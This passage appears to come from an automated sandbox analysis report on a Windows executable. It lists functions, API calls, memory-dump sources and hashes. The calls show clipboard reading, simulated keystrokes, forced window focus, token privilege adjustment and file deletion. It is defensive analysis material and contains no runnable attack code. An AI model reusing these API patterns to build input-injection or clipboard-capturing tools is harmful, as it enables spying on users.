                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003E09F4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: LongNamePath
                                                    • String ID:
                                                    • API String ID: 82841172-0
                                                    • Opcode ID: 037d8a12ea6ed8bdac8d763e2e41a4924bac744d424e3c810ff1afe5921413b5
                                                    • Instruction ID: 9e4672d2a2a67deac45fb8ab9754f74903292b6f77bfc25de4337d544d83c63f
                                                    • Opcode Fuzzy Hash: 037d8a12ea6ed8bdac8d763e2e41a4924bac744d424e3c810ff1afe5921413b5
                                                    • Instruction Fuzzy Hash: C1E08637A410286AD7219296FC09FFBBB6CDB867F1F0000BBF90CD5404D9626C858670
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C44CB, Relevance: 1.5, APIs: 1, Instructions: 26windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 003C4527
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: IconNotifyShell_
                                                    • String ID:
                                                    • API String ID: 1144537725-0
                                                    • Opcode ID: 88e884292027030e22dc4c2530dc906e3cf83bb3f0913ac4bc30bd9c44b84eb0
                                                    • Instruction ID: e94452facddc57fcf0da62a3a0249b13178168e0baf673795b0b78ecd69e9b74
                                                    • Opcode Fuzzy Hash: 88e884292027030e22dc4c2530dc906e3cf83bb3f0913ac4bc30bd9c44b84eb0
                                                    • Instruction Fuzzy Hash: 45F082719043189FD7A39B24DC49BA97B6C970130CF0002EEAA0C96196D7760B88CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004249FF, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?), ref: 00424A18
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 65a6279161310a952fc4677f11fd6fc8d21fa2f604dd9b086be18c7038205035
                                                    • Instruction ID: 76840d9067677667fa39f8fbf64322a37a646a42ac85e27ba91736d028ba2773
                                                    • Opcode Fuzzy Hash: 65a6279161310a952fc4677f11fd6fc8d21fa2f604dd9b086be18c7038205035
                                                    • Instruction Fuzzy Hash: EED05B6650021C3EDB50A6B4AC0DDF77B6CDB01165F0002B1B55CC2051ED246D4587F0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C5DCF, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,003C5921,?,003C6C37), ref: 003C5DEF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 302fe8e6dc0e56dcc1125afb6afa8d50a1673e4b9ff4ef5103bc3bb53c09197e
                                                    • Instruction ID: a03bda4838727be719154349686f8085fa3174a9e497ba1e067a2749aa2d5471
                                                    • Opcode Fuzzy Hash: 302fe8e6dc0e56dcc1125afb6afa8d50a1673e4b9ff4ef5103bc3bb53c09197e
                                                    • Instruction Fuzzy Hash: DDE0B679504B01DFC6324F1AE80C852FFF8FEE13B13218A2ED0E681560D3716889CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C5DAE, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000001,?,?,?,003FE16B,?,?,00000000,?,?,00000000), ref: 003C5DBF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: d4d3c8421f133085cdb3c1436dfed155ca7664b86190c932d38b7d0861b2d66f
                                                    • Instruction ID: 3ad4c06231b74d52ad2a63bfb22b797b9578e810e78d5849087326f04f6e894e
                                                    • Opcode Fuzzy Hash: d4d3c8421f133085cdb3c1436dfed155ca7664b86190c932d38b7d0861b2d66f
                                                    • Instruction Fuzzy Hash: 13D09E75640108BFE6008780DC46FFA7B7CD706765F100195F5045559092B379448765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424CD3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,004253F4), ref: 00424CD4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 9f9725cf56e2b252b67d1f4a0104ba18a44dcaaf7777a79094df3a8b3da8c11f
                                                    • Instruction ID: 69663e521434afa4010cf09d90d8b0c7d8e613e362e57c3432d81187bc2f8f69
                                                    • Opcode Fuzzy Hash: 9f9725cf56e2b252b67d1f4a0104ba18a44dcaaf7777a79094df3a8b3da8c11f
                                                    • Instruction Fuzzy Hash: 12B09B6C315510055D14573D25080562301B8937A57D517D1D475451E2933D490BD514
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E32DF, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003E32AB: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,003E32EA,00000000,?,003E9EFE,000000FF,0000001E,0047BE28,00000008,003E9E62,00000000,?), ref: 003E32BA
                                                      • Part of subcall function 003E32AB: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 003E32CC
                                                    • ExitProcess.KERNEL32 ref: 003E32EE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressExitHandleModuleProcProcess
                                                    • String ID:
                                                    • API String ID: 75539706-0
                                                    • Opcode ID: 79ea82db1b31a5c474ebd671a8353dcd6e5fa186ca38999527781511414ef25c
                                                    • Instruction ID: 54e7a0934193033c2c510345d8f3227b543f837c6c3e2d7b713411d046eb6ed8
                                                    • Opcode Fuzzy Hash: 79ea82db1b31a5c474ebd671a8353dcd6e5fa186ca38999527781511414ef25c
                                                    • Instruction Fuzzy Hash: 54B09231000008BBDB022F12EC0A8A93F29FF026D57014021F80408070CB335A92DA90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E0E48, Relevance: 1.4, APIs: 1, Instructions: 102memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 240bf745a6459069f7ae9820c927726e76a73718ba73111390723c31c3d68aba
                                                    • Instruction ID: ab16b22948fb64099c8d03b623025f745867141d578d5547fb2b6fa574a2c8ca
                                                    • Opcode Fuzzy Hash: 240bf745a6459069f7ae9820c927726e76a73718ba73111390723c31c3d68aba
                                                    • Instruction Fuzzy Hash: BC314470A00545DBC71ACF5AC4C0969F7A6FF89300B298BA5E00ADB691D7B0EDC1CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042BE98, Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00423D4E: FindFirstFileW.KERNELBASE(?,?), ref: 00423DC5
                                                      • Part of subcall function 00423D4E: DeleteFileW.KERNEL32(?,?,?,?), ref: 00423E15
                                                      • Part of subcall function 00423D4E: FindNextFileW.KERNEL32(00000000,00000010), ref: 00423E26
                                                      • Part of subcall function 00423D4E: FindClose.KERNEL32(00000000), ref: 00423E3D
                                                    • GetLastError.KERNEL32 ref: 0042BEBA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                    • String ID:
                                                    • API String ID: 2191629493-0
                                                    • Opcode ID: 2f7ed6036cd099d3de9fff452c83aaffd9ee2eb0087e4fc67fa941f7625ecea7
                                                    • Instruction ID: 78d1ec7e1ce0996d732e778a63c3bd0bd081f7d758f9ca930775787ac64ef5b2
                                                    • Opcode Fuzzy Hash: 2f7ed6036cd099d3de9fff452c83aaffd9ee2eb0087e4fc67fa941f7625ecea7
                                                    • Instruction Fuzzy Hash: 5BF058363102109FCB11EF5AE845F6AB7E8AF48B20F05801EF94A8B352CB74BC01CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 0044CDAC, Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 648windowkeyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0044CE50
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044CE91
                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0044CED6
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0044CF00
                                                    • SendMessageW.USER32 ref: 0044CF29
                                                    • GetKeyState.USER32(00000011), ref: 0044CFC2
                                                    • GetKeyState.USER32(00000009), ref: 0044CFCF
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044CFE5
                                                    • GetKeyState.USER32(00000010), ref: 0044CFEF
                                                    • SendMessageW.USER32(?,0000110A,00000009,?), ref: 0044D018
                                                    • SendMessageW.USER32 ref: 0044D03F
                                                    • SendMessageW.USER32(?,00001030,?,0044B602), ref: 0044D145
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0044D15B
                                                    • ImageList_BeginDrag.COMCTL32(?,000000F8,000000F0), ref: 0044D16E
                                                    • SetCapture.USER32(?), ref: 0044D177
                                                    • ClientToScreen.USER32(?,?), ref: 0044D1DC
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0044D1E9
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0044D203
                                                    • ReleaseCapture.USER32(?,?,?), ref: 0044D20E
                                                    • GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 0044D248
                                                    • ScreenToClient.USER32 ref: 0044D255
                                                    • SendMessageW.USER32(?,00001012,004867B0,?), ref: 0044D2B1
                                                    • SendMessageW.USER32 ref: 0044D2DF
                                                    • SendMessageW.USER32(?,00001111,004867B0,?), ref: 0044D31C
                                                    • SendMessageW.USER32 ref: 0044D34B
                                                    • SendMessageW.USER32(?,0000110B,00000009,004867B0), ref: 0044D36C
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0044D37B
                                                    • GetCursorPos.USER32(?), ref: 0044D39B
                                                    • ScreenToClient.USER32 ref: 0044D3A8
                                                    • GetParent.USER32(?), ref: 0044D3C8
                                                    • SendMessageW.USER32(?,00001012,004867B0,?), ref: 0044D431
                                                    • SendMessageW.USER32 ref: 0044D462
                                                    • ClientToScreen.USER32(?,?), ref: 0044D4C0
                                                    • TrackPopupMenuEx.USER32(?,004867B0,?,?,?,004867B0), ref: 0044D4F0
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0044D51A
                                                    • SendMessageW.USER32 ref: 0044D53D
                                                    • ClientToScreen.USER32(?,?), ref: 0044D58F
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0044D5C3
                                                      • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044D65F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                    • String ID: @GUI_DRAGID$F$prH
                                                    • API String ID: 3429851547-816717882
                                                    • Opcode ID: b38515c01aab1ff4aa212f227d70f1215d5454e5c33415c13b7544e5e653f0cf
                                                    • Instruction ID: 36ad07642915fa84c60eac4ff8d66a656aae5660fb1fd9fa0ae89f49c5ad8f75
                                                    • Opcode Fuzzy Hash: b38515c01aab1ff4aa212f227d70f1215d5454e5c33415c13b7544e5e653f0cf
                                                    • Instruction Fuzzy Hash: 6F42BE34505240AFE721CF28C884FABBBE5FF49314F18092EF699972A1C7359855CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F5CCC, Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 178libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EncodePointer.KERNEL32(00484388,00000000,00484388,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010), ref: 003F5CF4
                                                    • LoadLibraryExW.KERNEL32(USER32.DLL,00484388,00000800,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010), ref: 003F5D1A
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA,00000104), ref: 003F5D26
                                                    • LoadLibraryExW.KERNEL32(USER32.DLL,00484388,00484388,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010), ref: 003F5D3C
                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 003F5D52
                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5D61
                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 003F5D6E
                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5D75
                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 003F5D82
                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5D89
                                                    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 003F5D96
                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5D9D
                                                    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 003F5DAE
                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5DB5
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA,00000104), ref: 003F5DBF
                                                    • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5DD1
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA,00000104), ref: 003F5DEF
                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5E11
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA,00000104), ref: 003F5E1C
                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5E61
                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA), ref: 003F5E79
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,003EA54D,00484388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,004843BA,00000104), ref: 003F5E8D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Pointer$DecodeEncode$AddressProc$LibraryLoad$DebugDebuggerErrorLastOutputPresentString
                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                    • API String ID: 3166169540-564504941
                                                    • Opcode ID: 7cc274cc2ebb600fba263d04d8d873931e91bc720cd3461c5c492e27de44e98d
                                                    • Instruction ID: 59aef35fcbad157bcd52272d55134fa7fd8c4ae7a6da112b48353fc55e49d774
                                                    • Opcode Fuzzy Hash: 7cc274cc2ebb600fba263d04d8d873931e91bc720cd3461c5c492e27de44e98d
                                                    • Instruction Fuzzy Hash: AE518D75A01A09AFDB129FB49C48ABF7BA8FF45740B25052AF705E2050DB349D04CBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C4A35, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?), ref: 003C4A3D
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003FDA8E
                                                    • IsIconic.USER32(?), ref: 003FDA97
                                                    • ShowWindow.USER32(?,00000009,?,?), ref: 003FDAA4
                                                    • SetForegroundWindow.USER32(?,?,?), ref: 003FDAAE
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003FDAC4
                                                    • GetCurrentThreadId.KERNEL32 ref: 003FDACB
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 003FDAD7
                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?), ref: 003FDAE8
                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?), ref: 003FDAF0
                                                    • AttachThreadInput.USER32(00000000,?,00000001,?,?), ref: 003FDAF8
                                                    • SetForegroundWindow.USER32(?,?,?), ref: 003FDAFB
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FDB10
                                                    • keybd_event.USER32 ref: 003FDB1B
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FDB25
                                                    • keybd_event.USER32 ref: 003FDB2A
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FDB33
                                                    • keybd_event.USER32 ref: 003FDB38
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FDB42
                                                    • keybd_event.USER32 ref: 003FDB47
                                                    • SetForegroundWindow.USER32(?,?,?), ref: 003FDB4A
                                                    • AttachThreadInput.USER32(?,?,00000000,?,?), ref: 003FDB71
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: c1dc4d73bb27f8d865931f8040ee53ef02592e962607d628a5eb9325b7254c7d
                                                    • Instruction ID: c41d2f500aee6aead1f7020ee5e205326f79fbc9f750035d129ae5624ea6bc91
                                                    • Opcode Fuzzy Hash: c1dc4d73bb27f8d865931f8040ee53ef02592e962607d628a5eb9325b7254c7d
                                                    • Instruction Fuzzy Hash: A7317075A8021CBAEF226FA19C49FBF3E6DEB45B50F114035FA04EA1D1C6B05D01ABA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418858, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 229COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00418CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00418D0D
                                                      • Part of subcall function 00418CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418D3A
                                                      • Part of subcall function 00418CC3: GetLastError.KERNEL32 ref: 00418D47
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004188ED
                                                    • CloseHandle.KERNEL32(?), ref: 004188FE
                                                    • OpenWindowStationW.USER32 ref: 00418915
                                                    • GetProcessWindowStation.USER32 ref: 0041892E
                                                    • SetProcessWindowStation.USER32(00000000), ref: 00418938
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00418952
                                                      • Part of subcall function 00418713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00418AEE), ref: 00418728
                                                      • Part of subcall function 00418713: CloseHandle.KERNEL32(?,00000000,00418AEE), ref: 0041873A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue
                                                    • String ID: $default$winsta0
                                                    • API String ID: 3576815822-1027155976
                                                    • Opcode ID: 24c68e20e48f3bb69d54116618c59af600ee4e63275a4c6279e84e3ec7488f04
                                                    • Instruction ID: 5ca29d90147126f0ad482bdce417a0ef00b4431f2099e73a0b91cd086799805d
                                                    • Opcode Fuzzy Hash: 24c68e20e48f3bb69d54116618c59af600ee4e63275a4c6279e84e3ec7488f04
                                                    • Instruction Fuzzy Hash: 6B814971940209BFDF11DFA0DC45AEFBBB8EF05345F08412BF910A6261DB398E959B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043425A, Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenClipboard.USER32(0044F910), ref: 00434284
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00434292
                                                    • GetClipboardData.USER32 ref: 0043429A
                                                    • CloseClipboard.USER32 ref: 004342A6
                                                    • GlobalLock.KERNEL32 ref: 004342C2
                                                    • CloseClipboard.USER32 ref: 004342CC
                                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 004342E1
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 004342EE
                                                    • GetClipboardData.USER32 ref: 004342F6
                                                    • GlobalLock.KERNEL32 ref: 00434303
                                                    • GlobalUnlock.KERNEL32(00000000,00000000,?,00000000), ref: 00434337
                                                    • CloseClipboard.USER32 ref: 00434447
                                                    Memory Dump Source
